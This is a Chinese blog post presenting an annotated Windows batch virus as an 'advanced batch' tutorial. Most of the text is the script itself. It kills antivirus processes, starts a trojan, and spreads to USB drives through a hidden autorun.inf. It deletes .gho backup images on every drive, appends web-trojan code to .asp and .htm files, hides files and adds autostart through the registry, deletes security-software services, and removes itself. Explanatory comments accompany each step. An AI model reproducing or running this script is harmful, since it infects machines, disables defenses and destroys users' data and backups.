批处理高级应用之编写病毒

  • A+
所属分类:[开发技巧]

@echo off
REM 以下批处理内容中止众多安全软件进程
tskill Mcshield.exe & tskill VsTskMgr.exe & tskillnaPrdMgr.exe & tskill UpdaterUI.exe &
tskill TBMon.exe & tskill scan32.exe & tskill Ravmond.exe & tskill CCenter.exe &
tskill RavTask.exe & tskill Rav.exe & tskill Ravmon.exe & tskill RavmonD.exe &
tskill RavStub.exe & taskill KVXP.kxp & tskill kvMonXP.kxp & tskill KVCenter.kxp &
tskill KRegEx.exe & tskill UIHost.exe & tskill TrojDie.kxp & tskill Logo_1.exe &
tskill Rundll32.exe //tskill是结束进程的命令,&是一个组合命令,顺序执行不管前面是否失败

REM 启动木马程序
start /b %systemroot%\system32\muma.com
REM 遍历所有驱动器寻找可移动磁盘
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z)do @fsutil fsinfo drivetype %%i:>>%systemroot%\temp.txt
//Fsutil是可用于执行多种与FAT和NTFS文件系统相关的任务,加上fsinfo是列出所有驱动器的信息。再加上drivetype就是查询一个驱动器的驱动器类型。 %%i 是一个变量,这里分别将c、d、e至z的各个驱动器赋值给这个&&i的变量,然后用fsutil查询出驱动器类型。最后用 >>追加到文件temp.txt
findstr /i "可移动驱动器" %systemroot%\temp.txt
//find是查询字符串的一个命令,/i参数表示不区分大小写
if errorlevel==1 goto next
//if errorlevel==1 表示如果出错则执行的命令,goto是跳转语句,会跳转到以:next为行号的地方继续。这里如果出错就表示上面for循环的执行结果没发现一个带有“可移动驱动器”的盘符
if errorlevel==0 goto cop
:cop
for /f "tokens=1" %%i in ('findstr /i "可移动驱动器" %systemroot%\temp.txt') do @set yidong=%%i
//tokens=1 把for分作一列。单引号表示是in里面的语句,不能省略。do后面是要执行的语句,set是赋值语句,将变量%%i赋值为环境变量yidong。

REM 向可移动硬盘内复制病毒
copy bat.exe %yidong%\ /y
//注意yidong由于已经是一个环境变量以后应用需要用成对的%%括起来。 /y 参数表示不提示确认。
copy muma.com %yidong%\ /y
attrib +s +h %yidong%\muma.com
attrib +s +h %yidong%\bat.exe
if exist %yidong%\autorun.inf (
attrib -a -s -h %yidong%\autorun.inf
del %yidong%\autorun.inf)
//如果存在autorun.inf则执行括号里面的内容。
echo [AutoRun]>%yidong%\Autorun.inf
echo shell\Open\command=bat.exe>>%yidong%\Autorun.inf
echo shell\Open=打开(^&O)
echo shell\explore=资源管理器(^&X)>>%yidong%\Autorun.inf
//^符号是转义字符,表示后面的&符号失去连接意义。这里加&是加粗显示的用途。
echo shell\explorer\command=bat.exe>>%yidong%\Autorun.inf
attrib +s +h %yidong%\Autorun.inf
del %systemroot%temp.txt /q /f
//删除用于存放临时信息的文件
:next
REM 循环遍历磁盘,自动删除*.gho文件
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul(
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.gho') do del "%%b" /q /f
))
//这里是对各个磁盘的gho文件进行查找,一旦发现即删除

REM 循环遍历磁盘,自动对ASP,ASPX插入网页木马代码
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul(
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.asp') do (echo ^>> "%%b")
))
REM 循环遍历磁盘,自动对HTM,HTML插入网页木马代码
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.htm') do (echo ^>> "%%b")
))
REM 修改注册表不显示隐藏文件
REG ADD "HKEY_LOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v "CheckedValue" /t REG_DWORD /d 0 /f
REM 添加注册表自启动项
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v type /t REG_EXPAND_SZ /d "c:\Windows\system32\bat.exe" /f
//REG ADD是对注册表进行添加操作, /v后面跟项的名称 /t后面跟数据类型 /f表示强制操作不提示
REM 删除安全软件在注册表中的键值
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RavTask /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Network Associates Error RePorting Service" /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStartEXE /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f
REM 删除以下服务
sc delete navapsvc
sc delete wscsvc
sc delete KPfwSvc
sc delete SNDSrvc
sc delete ccProxy
sc delete ccEvtMgr
sc delete ccSetMgr
sc delete SPBBCSvc
sc delete Symantec Core LC
sc delete NPFMntor
sc delete MskService
sc delete FireSvc

del muma.com
del bat.vbs
del %O
// %O 是删除自身的意思

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
广告也精彩
avatar
广告也精彩

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: